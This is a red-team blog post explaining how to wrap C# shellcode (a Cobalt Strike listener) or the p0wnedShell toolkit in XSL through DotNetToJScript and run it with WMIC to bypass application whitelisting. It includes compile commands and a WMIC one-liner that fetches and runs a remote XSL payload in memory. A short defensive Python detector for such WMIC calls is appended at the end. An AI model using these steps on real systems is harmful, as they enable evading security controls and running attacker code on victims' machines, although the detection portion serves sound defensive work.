In April 2018, Casey Smith published a finding he dubbed squiblytwo, which detailed how WMIC can be used to invoke arbitrary code contained in the Extensible Stylesheet Language (XSL) format.

The technique has some notable attractions:

  • Application whitelisting (AWL) bypass
  • Execute when Windows Script Host is blocked
  • Utilise JScript (DotNetToJScript hotness)
  • Load XSL locally or from a URL
  • WMIC is proxy aware (and works over TLS)

I encourage you to read through Casey’s original post before proceeding here.

The goal of this post is to walk through how you can take your own C#, run it through DotNetToJScript, and throw the output into XSL format.

Example 1

32-bit Shellcode

For this example we’re going to execute 32-bit shellcode for a Cobalt Strike HTTP listener, using Arno0x0x’s shellcodeLauncher as a template. The only thing we need to add is a constructor for the Program class.

Replace line 25 with your shellcode of choice.

Compile to DLL

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -unsafe -platform:x86 -target:library shellcode.cs

It’s probably good practice to test your payload every step of the way. So before compiling to a DLL, compile to an EXE and run it to make sure it works as expected.

DotNetToJScript

Next, provide the DLL to DotNetToJScript. Remember to modify the entry class if you’re using a different namespace and class name.

DotNetToJScript.exe -c ShellCodeLauncher.Program -o C:\Tools\shellcode.js C:\Tools\shellcode.dll

You can test the js file using cscript, but because we’re outputting to 32-bit, we need to use the 32-bit cscript.exe in SysWOW64.

C:\Windows\SysWOW64\cscript.exe C:\Tools\shellcode.js

XSL

The final step is to wrap the js in the tags required by XSL. We can use the squiblytwo PoC as a template.

The final result should look something like this.

Again, because it’s 32-bit, we need the SysWOW64 wmic to execute.

C:\Windows\SysWOW64\wbem\WMIC.exe os get /format:"C:\Tools\shellcode.xsl"

Example 2

p0wnedShell

p0wnedShell is a well-known PowerShell runspace post-exploitation toolkit written in C# that can run PowerShell commands and functions within a runspace environment without using powershell.exe. p0wnedLoader is probably less well known and is not maintained with the main p0wnedShell repo. It enables you to download an AES encrypted version of p0wnedShell, decrypt it, then run it from memory.

For the purposes of this post, we’ll just use the old p0wnedShell in the p0wnedLoader repo - of course, you can compile and encrypt your own version with p0wnedEncrypt.

As before, modify p0wnedLoader to provide a constructor for DotNetToJScript, then repeat the same steps in Example 1 to compile p0wnedLoader.cs to a DLL, run DotNetToJScript and put it in XSL format.

If we also host the XSL online, we can run the entire thing without touching disk.

C:\Windows\System32\wbem\WMIC.exe os get /format:"https://raw.githubusercontent.com/rasta-mouse/p0wnedLoader/master/p0wnedLoader.xsl"

          ___                     ____                __
    ___  / _ \_    _____  ___ ___/ / /  ___  ___ ____/ /__ ____
   / _ \/ // / |/|/ / _ \/ -_) _  / /__/ _ \/ _ `/ _  / -_) __/
  / .__/\___/|__,__/_//_/\__/\_,_/____/\___/\_,_/\_,_/\__/_/
 /_/

           Loads an Online AES Encrypted version of p0wnedShell
                                                By Cn33liz 2016


[*] Please enter the p0wnedShell Stage2 URL > https://raw.githubusercontent.com/Cn33liz/p0wnedLoader/master/p0wnedShellx64.enc

[*] One moment while getting our Stage2 payload.... -> Done

[*] Now please enter our Decryption Password > **********

Et voila.
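As an added defender-side example (not code from the original post or from any of the tools it references), the following Python scans constructed Sysmon-style process-creation command lines and flags WMIC invocations whose /format: argument names a caller-supplied stylesheet (a local path, UNC path or URL) rather than one of WMIC's built-in format keywords, covering both the SysWOW64 and System32 binaries used in Examples 1 and 2. The sample command lines and the built-in keyword list are assumptions made here.

```python
import re
from typing import Optional

# Constructed sample process-creation command lines (Sysmon Event ID 1 style);
# these are made up for this example, not log lines from the original post.
SAMPLE_CMDLINES = [
    r'C:\Windows\SysWOW64\wbem\WMIC.exe os get /format:"C:\Tools\shellcode.xsl"',
    r'C:\Windows\System32\wbem\WMIC.exe os get /format:"https://example.invalid/loader.xsl"',
    r'C:\Windows\System32\wbem\WMIC.exe os get /format:list',
    r'C:\Windows\System32\wbem\WMIC.exe process list brief',
    r'C:\Windows\System32\wbem\WMIC.exe /node:host1 os get /FORMAT:hform',
    r'wmic os get /format:"\\fileserver\share\report.xsl"',
]

# WMIC's built-in format keywords (assumed list); these map to stylesheets that
# ship in the wbem directory. Anything else is a stylesheet supplied by the caller.
BUILTIN_FORMATS = {"list", "table", "csv", "hform", "htable", "mof",
                   "rawxml", "xml", "textvaluelist", "value"}

WMIC_RE = re.compile(r'(^|\\|\s)wmic(\.exe)?\b', re.IGNORECASE)
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)


def classify_format(value: str) -> str:
    """Return 'url', 'file' or 'builtin' for the value passed to /format:."""
    v = value.strip().lower()
    if re.match(r'^[a-z][a-z0-9+.\-]*://', v):
        return "url"
    # Built-in keywords may carry modifiers (htable-sortby:Name) or an .xsl suffix.
    keyword = re.split(r'[-:]', v)[0]
    if keyword.endswith(".xsl"):
        keyword = keyword[:-4]
    return "builtin" if keyword in BUILTIN_FORMATS else "file"


def find_wmic_xsl(cmdline: str) -> Optional[dict]:
    """Flag a WMIC command line whose /format: points at a caller-supplied stylesheet."""
    if not WMIC_RE.search(cmdline):
        return None
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    kind = classify_format(m.group(1))
    if kind == "builtin":
        return None
    # Note the 32-bit binary too: the post uses SysWOW64\wbem\WMIC.exe for x86 payloads.
    return {"source": m.group(1), "kind": kind, "wow64": "syswow64" in cmdline.lower()}


def scan(cmdlines):
    """Return (cmdline, finding) pairs for every suspicious WMIC invocation."""
    return [(line, hit) for line in cmdlines if (hit := find_wmic_xsl(line))]
```

Built-in keyword usage (/format:list, /format:hform) is left alone so the rule does not fire on ordinary administrative use; a hit on a URL or path is the signal worth correlating with the parent process and any outbound connection from wmic.exe.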